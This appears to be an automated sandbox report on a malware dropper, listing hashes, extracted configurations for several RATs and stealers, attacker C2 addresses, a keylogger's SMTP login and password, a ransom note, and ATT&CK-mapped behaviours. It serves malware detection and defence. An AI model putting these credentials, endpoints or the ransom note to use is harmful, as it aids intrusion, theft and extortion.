asyncrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
206s
max time network
302s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
26/02/2025, 23:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

asyncrat

Version

Esco Private rat

Botnet

Default

196.251.88.53:4449

Mutex

voodynqjploelta

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

vidar

Botnet

ir7am

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.jhxkgroup.online
Port:
587
Username:
[email protected]
Password:
7213575aceACE@@
Email To:
[email protected]

Extracted

Family

xworm

Version

5.0

185.7.214.108:4411

185.7.214.54:4411

aes.plain

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Domain

jojo.ath.cx:1414

Mutex

AsyncMutex_7SI8OkPne

Attributes

delay
3
install
false
install_file
dllscv.exe
install_folder
%AppData%

aes.plain

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

Ransom Note

ATTENTION! Don't worry, you can return your files! All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and your key. Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours. Contact us email: [email protected] [email protected] ID :567F0FDBA29DCE0781600D5B5C6E6E701FE94ACD07287F81043E6D940D468C04B598142215415069BC9036526D0C579A156375A6333E1FBA7A7AF1BA804400E031DF56D1EE62DB3D7AB18756506553668C374DB0DB207875C6EC8FA734DBEC01F8E6832E1D22CA35C981422F0A5E43BE7F775E9A914CA08B1BF914CB4008BBC02EDD29992D43BED4607DD8AD77ACAA53E9864EBD39C32DBDF864FE239E46F440D5058B943F446350EE1C00B2750460F7ACCD46C597EBB3E7CF14E7841573EBE5FFD264F5142CEBBA50614D0C22FB7DBB2BBB8C63DEA811093E802E64A874AD457DCBC5E7F3B0CCFB7F1DE8BF5E1DEDA457702B9455A7E3DE3D5E948B72D3796AE8C1E7D1693F9874A6A428044760BE03903678AB5BDE41E55F5713972DAC9FF4E5CEEAB3A7F02DB56C7DF80C2D758A92431BF5E2186E717664AB13D9A6E1A587D1C33FC761667692ED9542461522316074C1D023ED1E85D0575C8044071D49CE7E58C456C27E65D4C45D60CFB9C2573B8E9DF5E83A6A585EDB8E74794D180C265CC1B5F6E3A79CFD00CA4110AD8C354B469D0FED2B01A3D0B992A7292D2F252DD099DDDDAC9F0E63E87A4239BFD9A47C2CD524C2156A07A50F41A757DD2822186642AC5CC15C57EFB7AB1713692F156F7A67376604213ECDE0E58D26ACD7A0D39E90F8B4BD896A7C5BEBEBD87755E117C657E6E4FCD35E5AB216B562A93B816354F229A251DA8B7CF60BC2664BA5D5B94F45FC3D7A1789B85EC7994AD0418323E3528BFF62942D541B3DD3FD5D518F2F5E2C56FE5B466BDED96BAEB10651DAFFD37B0C6695EDC25054DFBBB6ED370ABAF5B394C7DAFFF72C2A231DAA17BC840120BAEFF90F3ADC9C661727BC7290C4D49D335EAD1E2BE6773816CD2BBCFE419B564E1CB5DF83C5DC4C0EBC62DDC6148289620D7BCFB4A5A1861A3388CEFD80ED2C8DD592F44F4123EC399BA21F2DCA07F72A14A730558AE63476EB6CFF9CB12F5461C8F5E5A8A1692665EC3AC2D3059A9545D52610D9FDA348ACD278911514E140424C10752A365213674F2ED481E34207E2888D978AB196820CD9526CBA4FDF4759C98257C779B56C07ABE994358C88E84CE8DEC608C078A132B1A822DC0B64D4F28E8D40924D52E605118995AF5BB1366309EC8DA91DC6A4A44E98D1D00DF83922A3A121789C5FFAB1454FC09DAAED821131C29A01F45B0245E8195DF01D57D47E42852C033BC52613FF820EA9AB9A260D90D0891C434AC230A429995448910C2336B9146CFC2B567C0388ECC490E6139B8AF7FE5A50380884C3C176BC8FCFE16470C7C1E42E308F711AFFD52FA8B371D17C7492FE2D0B51F805F620B7FE2ACB239FEFB48443AC009559EF542EEA2092C6C6B2CE16781E1BE8BEBBF3F2BEC41043D441BE58A27B837DB0FF6FCB17B91E95B438DBAB0EED02960B670D6B63B8C8E033026CBE84D691880CEAAFDB9BEA93C7AB35CD33F0BCEFA7D50E8F7590B5B59440A34DBB076FA70ACDE4C45F94C4FB1732BC4B9D68A4357DCD3DC1DC3DBE01CCB25DFA513002B5BBBB19F2878BC6765BD602EFAF44E0E071138A907414ABBD08B22CA6D1C9750E9FB17DF3B7BF52FED3F71983B91572A8864FAD004BA101C08EF4731C7ECE43F8FA10E1CF7E23AA624EBA0C78C78171D6973252AC402E50BB1ECE0BD7EE5757A673A5DB4B275AABB9944BFF7CB248594882652BA2A1356336889077377E7F87D9328C82952DBA221D60250BC5D0B95956707C887DD6F92939BA6E566AE5665D563431CD244B067CF12AC1AAD86D141BC9241ACA0826461105BCE83A4CB456968F9DF093D17C734A9BBD81EE5CBF8396EAB129DD2277BF899A27703FEAA3B8417EA0D962BC7C98C4D4C2D0453C4EC45FE18A6D7847E2E6F1818E03BBFDACA11FBA7E1F8B91356DAB2CB97AFA51FCED5029446D4C842E67717767FBB8F08DE4E88C566B6858A52C355774D8358C92EE7D9DB74EB3053393C45FE9C0905FAA1606BC2CE63597829E20EC189992D87ADB92BC6968B75878F219A1D33B1C51155BE65071C45FD23540E2BD58EF998D54C67FB56D025EA0A0540BFED0C6BBCCDB6361203C6E019929CECB4F4467437FE31ED499F02602BA24BC37EA07FC1F229FF92AA26CF086F0F67A1858B94019E26AE36B5EE054DFFD707C89B6E086DB72E36751354C2EC0BFEFAF34C19558926C55D97D8609A6EFD75608A8EF84479B948A48D9D625CF0CA60975B04001156D3822B56A919D0A5C42F340BD8AC6E21848B11314A16724C8B971FB95E239D0A6BF94E632B38694606A3E2489A95C23F7392941E7E97187F8E7A5F2FC9FF0D175571F10E4C857FB87D6DCCF1130972975DF46466DDF4912

Emails

[email protected]

Extracted

Family

lumma

https://paleboreei.biz/api

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Vidar Stealer 12 IoCs

stealer

resource	yara_rule
behavioral3/memory/2388-282-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral3/memory/2388-284-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral3/memory/2388-305-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral3/memory/2388-306-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral3/memory/2388-311-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral3/memory/2388-313-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral3/memory/2388-316-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral3/memory/2388-320-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral3/memory/2388-321-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral3/memory/2388-322-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral3/memory/2388-326-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral3/memory/2388-329-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/memory/2396-4595-0x00000000016E0000-0x00000000016F0000-memory.dmp	family_xworm
behavioral3/memory/2992-4599-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Vipkeylogger family
vipkeylogger

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral3/files/0x0007000000023cbd-8647.dat	family_xmrig
behavioral3/files/0x0007000000023cbd-8647.dat	xmrig

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral3/memory/6044-178-0x0000000002440000-0x0000000002458000-memory.dmp	family_asyncrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral3/files/0x0007000000023cb5-7930.dat	mimikatz

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to execute payload.

execution

PowerShell

T1059.001

pid	Process
2548	powershell.exe
1100	powershell.exe
6216	powershell.exe
3560	PowerShell.exe
4660	powershell.exe
4188	powershell.exe
1652	powershell.exe
2584	powershell.exe
1612	powershell.exe
4068	powershell.exe
3364	powershell.exe
1516	powershell.EXE

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 13 IoCs

flow	pid	Process
177	5584	AA.exe
181	1388	New Text Document mod.exe
171	1388	New Text Document mod.exe
75	1388	New Text Document mod.exe
75	1388	New Text Document mod.exe
75	1388	New Text Document mod.exe
78	1388	New Text Document mod.exe
78	1388	New Text Document mod.exe
78	1388	New Text Document mod.exe
5	1388	New Text Document mod.exe
67	1388	New Text Document mod.exe
101	1388	New Text Document mod.exe
172	1388	New Text Document mod.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
336	netsh.exe
2164	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 7 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
68	msedge.exe
4960	msedge.exe
744	msedge.exe
5984	chrome.exe
4092	chrome.exe
4596	chrome.exe
5000	chrome.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	jKuil2m4oIniPNC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	osfile01.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	4KKi8Zrv9nyAmhR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	coinbase.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	cryptedprosp.exe

Executes dropped EXE 22 IoCs

pid	Process
4988	esco.exe
3580	coinbase.exe
3084	coinbase.tmp
4656	coinbase.exe
5892	coinbase.tmp
4744	cryptedprosp.exe
404	jKuil2m4oIniPNC.exe
1864	osfile01.exe
3284	4KKi8Zrv9nyAmhR.exe
4968	VBUN8fn.exe
4324	6NPpGdC.exe
5636	6NPpGdC.exe
5640	q3na5Mc.exe
2388	q3na5Mc.exe
5588	random.exe
2652	cryptedprosp.exe
2948	jKuil2m4oIniPNC.exe
4644	4KKi8Zrv9nyAmhR.exe
5868	osfile01.exe
2188	update.exe
5584	AA.exe
3972	WindowsLib.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	random.exe

Loads dropped DLL 5 IoCs

pid	Process
3084	coinbase.tmp
3084	coinbase.tmp
5892	coinbase.tmp
5892	coinbase.tmp
6044	regsvr32.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	osfile01.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	osfile01.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	osfile01.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cryptedprosp.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cryptedprosp.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cryptedprosp.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
1208	cmd.exe
3804	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
204	raw.githubusercontent.com
205	raw.githubusercontent.com

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
157	checkip.dyndns.org
165	reallyfreegeoip.org
167	reallyfreegeoip.org
169	reallyfreegeoip.org
173	reallyfreegeoip.org
178	reallyfreegeoip.org

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
5588	random.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4324 set thread context of 5636	4324	6NPpGdC.exe	125
PID 5640 set thread context of 2388	5640	q3na5Mc.exe	129
PID 4744 set thread context of 2652	4744	cryptedprosp.exe	147
PID 404 set thread context of 2948	404	jKuil2m4oIniPNC.exe	150
PID 3284 set thread context of 4644	3284	4KKi8Zrv9nyAmhR.exe	158
PID 1864 set thread context of 5868	1864	osfile01.exe	159

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5872	sc.exe
6460	sc.exe
2472	sc.exe
6220	sc.exe
2904	sc.exe
2748	sc.exe
1804	sc.exe
6976	sc.exe
6440	sc.exe
2072	sc.exe
3772	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
5060	4324	WerFault.exe	124
2404	5640	WerFault.exe	127
6204	5880	WerFault.exe	212
4600	5880	WerFault.exe	212

System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jKuil2m4oIniPNC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	osfile01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jKuil2m4oIniPNC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	coinbase.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	osfile01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VBUN8fn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6NPpGdC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6NPpGdC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4KKi8Zrv9nyAmhR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cryptedprosp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	q3na5Mc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4KKi8Zrv9nyAmhR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	esco.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	coinbase.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cryptedprosp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	coinbase.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsLib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	coinbase.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	q3na5Mc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PowerShell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3604	cmd.exe
6168	PING.EXE

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	q3na5Mc.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	q3na5Mc.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
3912	timeout.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe

Kills process with taskkill 10 IoCs

defense_evasion

pid	Process
6388	taskkill.exe
3952	taskkill.exe
3552	taskkill.exe
744	taskkill.exe
5764	taskkill.exe
6048	taskkill.exe
4216	taskkill.exe
4000	taskkill.exe
6200	taskkill.exe
1536	taskkill.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
5056	reg.exe
6404	reg.exe
1720	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6168	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1900	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5892	coinbase.tmp
5892	coinbase.tmp
6044	regsvr32.exe
6044	regsvr32.exe
4988	esco.exe
2548	powershell.exe
4988	esco.exe
2548	powershell.exe
4988	esco.exe
3560	PowerShell.exe
3560	PowerShell.exe
6044	regsvr32.exe
6044	regsvr32.exe
1100	powershell.exe
1100	powershell.exe
6044	regsvr32.exe
6044	regsvr32.exe
6044	regsvr32.exe
4968	VBUN8fn.exe
4968	VBUN8fn.exe
4968	VBUN8fn.exe
4968	VBUN8fn.exe
5636	6NPpGdC.exe
5636	6NPpGdC.exe
5636	6NPpGdC.exe
5636	6NPpGdC.exe
5588	random.exe
5588	random.exe
5588	random.exe
5588	random.exe
5588	random.exe
5588	random.exe
2388	q3na5Mc.exe
2388	q3na5Mc.exe
2388	q3na5Mc.exe
2388	q3na5Mc.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
2948	jKuil2m4oIniPNC.exe
1864	osfile01.exe
1864	osfile01.exe
2948	jKuil2m4oIniPNC.exe
2652	cryptedprosp.exe
2652	cryptedprosp.exe
3364	powershell.exe
3364	powershell.exe
4188	powershell.exe
4188	powershell.exe
1652	powershell.exe
1652	powershell.exe
3364	powershell.exe
1864	osfile01.exe
4188	powershell.exe
4644	4KKi8Zrv9nyAmhR.exe
4644	4KKi8Zrv9nyAmhR.exe
2584	powershell.exe
2584	powershell.exe
1652	powershell.exe
2584	powershell.exe
5868	osfile01.exe
5868	osfile01.exe
2388	q3na5Mc.exe
2388	q3na5Mc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
68	msedge.exe
68	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1388	New Text Document mod.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	4988	esco.exe
Token: SeIncreaseQuotaPrivilege	2548	powershell.exe
Token: SeSecurityPrivilege	2548	powershell.exe
Token: SeTakeOwnershipPrivilege	2548	powershell.exe
Token: SeLoadDriverPrivilege	2548	powershell.exe
Token: SeSystemProfilePrivilege	2548	powershell.exe
Token: SeSystemtimePrivilege	2548	powershell.exe
Token: SeProfSingleProcessPrivilege	2548	powershell.exe
Token: SeIncBasePriorityPrivilege	2548	powershell.exe
Token: SeCreatePagefilePrivilege	2548	powershell.exe
Token: SeBackupPrivilege	2548	powershell.exe
Token: SeRestorePrivilege	2548	powershell.exe
Token: SeShutdownPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeSystemEnvironmentPrivilege	2548	powershell.exe
Token: SeRemoteShutdownPrivilege	2548	powershell.exe
Token: SeUndockPrivilege	2548	powershell.exe
Token: SeManageVolumePrivilege	2548	powershell.exe
Token: 33	2548	powershell.exe
Token: 34	2548	powershell.exe
Token: 35	2548	powershell.exe
Token: 36	2548	powershell.exe
Token: SeDebugPrivilege	3560	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	3560	PowerShell.exe
Token: SeSecurityPrivilege	3560	PowerShell.exe
Token: SeTakeOwnershipPrivilege	3560	PowerShell.exe
Token: SeLoadDriverPrivilege	3560	PowerShell.exe
Token: SeSystemProfilePrivilege	3560	PowerShell.exe
Token: SeSystemtimePrivilege	3560	PowerShell.exe
Token: SeProfSingleProcessPrivilege	3560	PowerShell.exe
Token: SeIncBasePriorityPrivilege	3560	PowerShell.exe
Token: SeCreatePagefilePrivilege	3560	PowerShell.exe
Token: SeBackupPrivilege	3560	PowerShell.exe
Token: SeRestorePrivilege	3560	PowerShell.exe
Token: SeShutdownPrivilege	3560	PowerShell.exe
Token: SeDebugPrivilege	3560	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	3560	PowerShell.exe
Token: SeRemoteShutdownPrivilege	3560	PowerShell.exe
Token: SeUndockPrivilege	3560	PowerShell.exe
Token: SeManageVolumePrivilege	3560	PowerShell.exe
Token: 33	3560	PowerShell.exe
Token: 34	3560	PowerShell.exe
Token: 35	3560	PowerShell.exe
Token: 36	3560	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	3560	PowerShell.exe
Token: SeSecurityPrivilege	3560	PowerShell.exe
Token: SeTakeOwnershipPrivilege	3560	PowerShell.exe
Token: SeLoadDriverPrivilege	3560	PowerShell.exe
Token: SeSystemProfilePrivilege	3560	PowerShell.exe
Token: SeSystemtimePrivilege	3560	PowerShell.exe
Token: SeProfSingleProcessPrivilege	3560	PowerShell.exe
Token: SeIncBasePriorityPrivilege	3560	PowerShell.exe
Token: SeCreatePagefilePrivilege	3560	PowerShell.exe
Token: SeBackupPrivilege	3560	PowerShell.exe
Token: SeRestorePrivilege	3560	PowerShell.exe
Token: SeShutdownPrivilege	3560	PowerShell.exe
Token: SeDebugPrivilege	3560	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	3560	PowerShell.exe
Token: SeRemoteShutdownPrivilege	3560	PowerShell.exe
Token: SeUndockPrivilege	3560	PowerShell.exe
Token: SeManageVolumePrivilege	3560	PowerShell.exe
Token: 33	3560	PowerShell.exe

Suspicious use of FindShellTrayWindow 53 IoCs

pid	Process
5892	coinbase.tmp
1864	osfile01.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
